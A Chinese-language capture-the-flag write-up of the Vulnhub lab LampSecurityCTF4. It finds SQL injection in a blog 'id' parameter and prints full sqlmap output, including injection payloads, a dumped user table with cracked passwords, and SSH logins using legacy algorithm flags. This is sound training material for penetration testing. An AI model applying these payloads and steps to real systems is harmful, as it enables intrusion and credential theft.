Vulnhub靶机:LampSecurityCTF4
主机发现
nmap端口扫描
Web渗透
SQL手工注入
SQLmap自动注入
SSH参数补写
获得初始系统shell
提权、rooted和总结
工具观点[Awesome]
网页
网页都点了一遍后发现有些?page=的地方,可以试一下传参数
http://192.168.100.111/index.html?page=blog&title=Blog
http://192.168.100.111/index.html?page=../../../../../../../../../etc/passwd
试了一下没有任意文件读取漏洞
随便点一些地方,看一下网址链接的变化
这里可以试一下sql注入
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /var/www/html/pages/blog.php on line 20
这个就是mysql的语法错误报错
这里就说明存在sql注入漏洞
我们使用sqlmap一把梭
sqlmap -u "http://192.168.100.111/index.html?page=blog&title=Blog&id=2" --dbs --dump --batch Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
枚举:
这些选项可用于枚举后端数据库管理系统信息、结构和表中包含的数据
-a, --all 检索所有内容
-b, --banner 检索 DBMS 横幅
-current-user 检索 DBMS 当前用户
-current-db 检索 DBMS 当前数据库
-passwords 枚举 DBMS 用户密码哈希
-dbs 枚举 DBMS 数据库
-tables 枚举 DBMS 数据库表
-columns 枚举 DBMS 数据库表列
-schema 枚举 DBMS 架构
-dump 转储 DBMS 数据库表条目
-dump-all 转储所有 DBMS 数据库表条目
-D DB 要枚举的 DBMS 数据库
-T TBL 要枚举的 DBMS 数据库表
-C COL 要枚举的 DBMS 数据库表列┌──(root㉿kali)-[~/Desktop/LampSecurityCTF4]
└─# sqlmap -u "http://192.168.100.111/index.html?page=blog&title=Blog&id=2" --dbs --dump --batch
___
__H__
___ ___[']_____ ___ ___ {1.8.5#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 04:53:20 /2024-09-11/
[04:53:20] [INFO] testing connection to the target URL
[04:53:20] [INFO] testing if the target URL content is stable
[04:53:21] [INFO] target URL content is stable
[04:53:21] [INFO] testing if GET parameter 'page' is dynamic
[04:53:21] [INFO] GET parameter 'page' appears to be dynamic
[04:53:21] [WARNING] heuristic (basic) test shows that GET parameter 'page' might not be injectable
[04:53:21] [INFO] testing for SQL injection on GET parameter 'page'
[04:53:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:53:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[04:53:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[04:53:21] [INFO] testing 'Generic inline queries'
[04:53:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[04:53:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[04:53:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[04:53:21] [INFO] testing 'Oracle AND time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
[04:53:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:53:21] [WARNING] GET parameter 'page' does not seem to be injectable
[04:53:21] [INFO] testing if GET parameter 'title' is dynamic
[04:53:21] [WARNING] GET parameter 'title' does not appear to be dynamic
[04:53:21] [WARNING] heuristic (basic) test shows that GET parameter 'title' might not be injectable
[04:53:21] [INFO] heuristic (XSS) test shows that GET parameter 'title' might be vulnerable to cross-site scripting (XSS) attacks
[04:53:21] [INFO] testing for SQL injection on GET parameter 'title'
[04:53:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:53:21] [WARNING] reflective value(s) found and filtering out
[04:53:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[04:53:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[04:53:21] [INFO] testing 'Generic inline queries'
[04:53:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[04:53:21] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[04:53:21] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[04:53:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[04:53:21] [INFO] testing 'Oracle AND time-based blind'
[04:53:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:53:21] [WARNING] GET parameter 'title' does not seem to be injectable
[04:53:21] [INFO] testing if GET parameter 'id' is dynamic
[04:53:21] [INFO] GET parameter 'id' appears to be dynamic
[04:53:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[04:53:21] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[04:53:21] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:53:21] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Ut")
[04:53:21] [INFO] testing 'Generic inline queries'
[04:53:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[04:53:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[04:53:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[04:53:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[04:53:21] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[04:53:21] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[04:53:21] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[04:53:21] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[04:53:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:53:21] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:53:21] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:53:21] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[04:53:21] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[04:53:21] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[04:53:21] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[04:53:21] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[04:53:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:53:21] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:53:21] [INFO] testing 'MySQL inline queries'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[04:53:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[04:53:21] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[04:53:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[04:53:31] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[04:53:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:53:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[04:53:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[04:53:31] [INFO] target URL appears to have 5 columns in query
[04:53:31] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 202 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=blog&title=Blog&id=2 AND 2800=2800
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=blog&title=Blog&id=2 AND (SELECT 4142 FROM (SELECT(SLEEP(5)))ZAWi)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: page=blog&title=Blog&id=2 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162627a71,0x586c7a67504d7a664a46756a6a4c4558636c4a705a797a4b435378537375444e744f746979626244,0x71627a7071)-- -
---
[04:53:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 5 (Bordeaux)
web application technology: PHP 5.1.2, Apache 2.2.0
back-end DBMS: MySQL >= 5.0.12
[04:53:31] [INFO] fetching database names
available databases [6]:
[*] calendar
[*] ehks
[*] information_schema
[*] mysql
[*] roundcubemail
[*] test
[04:53:32] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[04:53:32] [INFO] fetching current database
[04:53:32] [INFO] fetching tables for database: 'ehks'
[04:53:32] [INFO] fetching columns for table 'user' in database 'ehks'
[04:53:32] [INFO] fetching entries for table 'user' in database 'ehks'
[04:53:32] [INFO] recognized possible password hashes in column 'user_pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[04:53:32] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[04:53:32] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[04:53:32] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[04:53:32] [INFO] starting 4 processes
[04:53:32] [INFO] cracked password 'Homesite' for user 'pmoore'
[04:53:32] [INFO] cracked password 'Sue1978' for user 'jdurbin'
[04:53:33] [INFO] cracked password 'ilike2surf' for user 'dstevens'
[04:53:34] [INFO] cracked password 'seventysixers' for user 'achen'
[04:53:34] [INFO] cracked password 'pacman' for user 'sorzek'
[04:53:35] [INFO] cracked password 'undone1' for user 'ghighland'
Database: ehks
Table: user
[6 entries]
+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass |
+---------+-----------+--------------------------------------------------+
| 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) |
| 2 | achen | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) |
| 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) |
| 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 (pacman) |
| 6 | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1) |
+---------+-----------+--------------------------------------------------+
[04:53:36] [INFO] table 'ehks.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.111/dump/ehks/user.csv'
[04:53:36] [INFO] fetching columns for table 'comment' in database 'ehks'
[04:53:36] [INFO] fetching entries for table 'comment' in database 'ehks'
[04:53:36] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[04:53:36] [INFO] fetching number of entries for table 'comment' in database 'ehks'
[04:53:36] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:53:36] [INFO] retrieved: 0
[04:53:36] [WARNING] table 'comment' in database 'ehks' appears to be empty
Database: ehks
Table: comment
[0 entries]
+------------+-------------+--------------+--------------+---------------+----------------+
| comment_id | comment_url | comment_body | comment_date | comment_title | comment_author |
+------------+-------------+--------------+--------------+---------------+----------------+
+------------+-------------+--------------+--------------+---------------+----------------+
[04:53:36] [INFO] table 'ehks.`comment`' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.111/dump/ehks/comment.csv'
[04:53:36] [INFO] fetching columns for table 'blog' in database 'ehks'
[04:53:36] [INFO] fetching entries for table 'blog' in database 'ehks'
Database: ehks
Table: blog
[4 entries]
+---------+---------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+----------------------------------------------+
| blog_id | user_id | blog_body | blog_date | blog_title |
+---------+---------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+----------------------------------------------+
| 2 | 4 | Etiam auctor, massa quis viverra vulputate, dolor felis consectetur lectus, at ultrices tortor mauris consequat justo. Duis hendrerit magna in justo. Sed a massa. Sed fermentum. Nunc lacus sem, eleifend non, hendrerit nec, sollicitudin in, odio. Nulla facilisi. Cras mi nibh, egestas ut, tincidunt id, sagittis a, enim. Maecenas non ligula vitae nibh faucibus laoreet. Praesent ipsum lectus, congue eget, tempus vel, dictum at, nisl. Ut tristique enim in justo. Aliquam at sapien. Aliquam erat volutpat. In gravida magna. Pellentesque orci nunc, sodales eu, luctus eget, porta nec, libero. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Nulla facilisi. Quisque a nisl sit amet risus fringilla commodo. Aenean tellus. Praesent luctus diam quis mi.\r\n\r\nMaecenas vel justo sed augue gravida sagittis. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Proin non est. Integer pharetra placerat est. Ut aliquam lectus quis metus. Donec sollicitudin ligula ut sem. Integer dui tellus, pellentesque in, molestie ut, rhoncus nec, odio. Nullam a diam. Proin laoreet libero sed ipsum. Aliquam lectus. Sed venenatis enim in libero. Sed vel libero sit amet sapien placerat rutrum. Nam porta mauris quis mauris. Donec rutrum quam a magna. In non ante. Integer placerat. Praesent aliquet, velit ac feugiat fermentum, diam neque aliquet diam, nec pellentesque turpis nisi eu quam. Aenean suscipit magna non felis commodo malesuada. Praesent dictum pretium velit. Donec ante ipsum, semper ut, ultrices at, fringilla nec, magna. | 2009-03-09 09:53:15 | Praesent aliquet, velit ac feugiat fermentum |
| 5 | 4 | Curabitur neque. Aenean laoreet. Vestibulum mollis ligula ut quam. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Cras ut lacus. Sed mauris lectus, adipiscing vel, semper ut, dignissim id, ipsum. Nunc semper, libero sit amet sodales dictum, massa metus dapibus neque, eu placerat erat lacus in augue. Maecenas dignissim molestie quam. Nunc ut nulla. Curabitur ullamcorper gravida tortor.\r\n\r\nIn tellus neque, semper eget, eleifend sit amet, aliquam vel, mi. Maecenas rhoncus eros ut risus. Maecenas hendrerit massa sed nisl. Sed placerat, neque quis aliquet condimentum, neque nibh luctus justo, vitae congue sem mi in dui. Cras porttitor. Nullam eu ante id augue aliquet dictum. Suspendisse non magna fermentum sapien mollis mollis. Morbi facilisis, turpis non blandit lobortis, est nunc condimentum lorem, et vulputate felis velit sit amet sapien. Vestibulum in metus. Vivamus rhoncus purus nec lacus. Curabitur sem dui, ullamcorper quis, varius non, blandit id, mi. Pellentesque rutrum. Donec massa augue, tincidunt eget, interdum nec, luctus non, risus. Sed in dolor in velit viverra gravida.\r\n\r\nEtiam facilisis mollis tortor. Sed id arcu. Nullam ornare pellentesque odio. Integer orci orci, viverra et, tincidunt eu, semper vitae, velit. Morbi tristique pharetra justo. Vestibulum eu mi in nunc euismod pellentesque. Morbi ligula augue, malesuada quis, consectetur non, pharetra non, dui. Vestibulum suscipit nibh vel dui. Nullam tempus odio vitae tortor gravida feugiat. In non libero sed est blandit malesuada. Proin a nibh. Integer tempor, nisl vel laoreet consectetur, leo nisl auctor leo, id feugiat massa mauris eget neque.\r\n\r\nInteger enim purus, auctor non, convallis in, viverra ut, arcu. Sed ut metus viverra est molestie tempus. Quisque nunc eros, eleifend id, commodo et, ultrices congue, ante. Sed auctor sapien eget diam. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Fusce ut risus. Pellentesque sit amet ligula nec nisi blandit ultrices. Aenean sem sapien, tempor ac, molestie ut, mattis eu, magna. Vivamus velit. In non lorem. Curabitur eget magna at quam iaculis porttitor. Ut sed velit. Quisque luctus justo eu lectus. Duis sit amet erat a tortor tincidunt pulvinar. | 2009-03-09 10:04:45 | Vivamus Velit |
| 6 | 4 | Suspendisse eget nisl. Nulla facilisi. Aenean turpis sapien, euismod in, molestie in, suscipit eget, diam. Suspendisse lorem elit, bibendum vel, imperdiet quis, facilisis vel, lectus. Maecenas convallis. Maecenas lacinia ligula eget libero. Fusce neque nibh, ornare sodales, porttitor ut, blandit nec, risus. Quisque neque sapien, ultrices ac, elementum ut, dignissim eget, nunc. Nunc nulla purus, fringilla ac, placerat eget, commodo ac, tellus. Ut velit. Morbi eget sem quis neque fringilla cursus. Morbi sit amet magna in lorem mollis porta. Ut euismod. Nam sapien nunc, blandit id, vestibulum ac, tempus quis, metus. Aliquam non enim. Cras feugiat nunc et turpis. Aenean dignissim mauris eget ante. Nulla felis. Cras vestibulum, magna nec porttitor porttitor, tortor mi congue nibh, eget porttitor neque lectus quis ligula.\r\n\r\nSuspendisse potenti. Mauris at nisi ac sem consequat laoreet. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Sed mi sem, tempus ut, consequat fringilla, ornare eu, nulla. Vestibulum quis erat in metus rutrum placerat. Maecenas accumsan imperdiet ante. Curabitur consequat lorem suscipit leo. Aliquam erat volutpat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Morbi placerat nibh sit amet nibh. Maecenas ultricies, nibh accumsan aliquam volutpat, orci velit varius nunc, ac ultricies ligula dui et lectus. Sed tempus consequat quam. Aenean convallis sapien in sem.\r\n\r\nNulla purus. Aenean enim. Vivamus mattis pellentesque velit. Aenean est nibh, aliquet id, scelerisque ac, rutrum quis, lorem. Integer tincidunt risus a mauris. In hac habitasse platea dictumst. Ut et arcu. Phasellus leo justo, sagittis nec, ullamcorper a, porta id, dui. Aliquam at magna. Pellentesque justo. Nullam facilisis. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Mauris ultrices elit non leo. Donec nunc dui, posuere quis, dignissim quis, tincidunt vitae, lacus. | 2009-03-09 10:05:05 | Aliquam Erat Volutpat |
| 7 | 5 | Vestibulum convallis. Quisque aliquet, sem eu tempor vehicula, augue mi semper tortor, ut rutrum metus mi et felis. Vestibulum consequat, augue sed ultrices rutrum, neque velit luctus arcu, vel condimentum sapien turpis at eros. Duis at orci vel est aliquet consequat. Fusce vitae lorem. Pellentesque non urna tincidunt libero tempus hendrerit. Donec consequat quam ac velit. Sed quis ante. Sed iaculis metus ac eros pharetra venenatis. Sed nec dolor. Ut tristique.\r\n\r\nSed quis lectus. Maecenas lacinia nisl eu sem. Curabitur id ante non orci tincidunt malesuada. Phasellus et urna. Nunc id nibh at tellus consequat accumsan. Aenean massa. Donec non est. Nunc leo. Vestibulum vulputate magna in diam. Duis vulputate elit dictum dolor. Sed purus nulla, condimentum et, posuere id, ultricies eget, risus. Aliquam erat volutpat. In blandit orci imperdiet ligula. Ut ut velit. Nullam tincidunt. Nunc aliquet tempus lorem.\r\n\r\nNam velit. In augue nibh, mollis sit amet, aliquet dapibus, lobortis eget, leo. Nullam risus augue, iaculis a, ullamcorper vitae, suscipit gravida, lorem. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Nunc lacinia tellus nec orci. Proin purus. Duis suscipit. Nullam eu dui. Suspendisse rutrum mollis arcu. Pellentesque nisi. Integer arcu ipsum, venenatis eget, scelerisque sed, adipiscing eget, diam. Vivamus tristique metus vel erat. Nulla iaculis. Ut ut neque vel odio consequat gravida. Suspendisse potenti.\r\n\r\nSed at ipsum ut lectus bibendum hendrerit. Etiam dignissim dui eu lectus. Etiam tristique enim et massa. Nunc tempor pellentesque sem. Aenean egestas metus in dolor. Phasellus auctor metus non dui. Phasellus eu mi. Suspendisse sed nibh. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Maecenas diam dolor, posuere porttitor, lobortis a, dignissim ut, ante. Etiam placerat. Proin id justo vel elit aliquam laoreet. Praesent sapien urna, lacinia id, dictum vel, ornare sit amet, lorem. In ac urna. Sed congue nisl ut ipsum. Donec vitae tortor. Nulla facilisi. Suspendisse id lacus. Sed consequat lacinia nisi. | 2009-03-09 10:06:26 | Justo Vel Elit Aliquam |
+---------+---------+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+----------------------------------------------+
[04:53:36] [INFO] table 'ehks.blog' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.111/dump/ehks/blog.csv'
[04:53:36] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.111'
[*] ending @ 04:53:36 /2024-09-11/Database: ehks
Table: user
[6 entries]
+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass |
+---------+-----------+--------------------------------------------------+
| 1 | dstevens | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf) |
| 2 | achen | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3 | pmoore | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite) |
| 4 | jdurbin | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978) |
| 5 | sorzek | 64d1f88b9b276aece4b0edcc25b7a434 (pacman) |
| 6 | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1) |
+---------+-----------+--------------------------------------------------+这里我们拿到了几组凭据
我们尝试使用ssh登录,碰碰运气
┌──(root㉿kali)-[~/Desktop/LampSecurityCTF4]
└─# ssh dstevens@192.168.100.111
Unable to negotiate with 192.168.100.111 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
这里提示没有匹配的主机密钥
iffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
那就添加-oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
┌──(root㉿kali)-[~/Desktop/LampSecurityCTF4]
└─# ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.100.111
Unable to negotiate with 192.168.100.111 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
提示没有匹配的主机密钥类型
添加-oHostKeyAlgorithms=ssh-rsa,ssh-dss
ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.100.111
查看当前用户sudo权限
无敌了~
🔑基本概念与权限操作
🔍端口扫描技术与参数
📊扫描与信息收集
💡信息分析与突破
🔐安装配置页的漏洞
🔓破解SSH与CMS漏洞
🌐URL传递数据与提权
💾FTP下载与隐藏信息
⚙️参数设置与协议扫描
-.-
评论区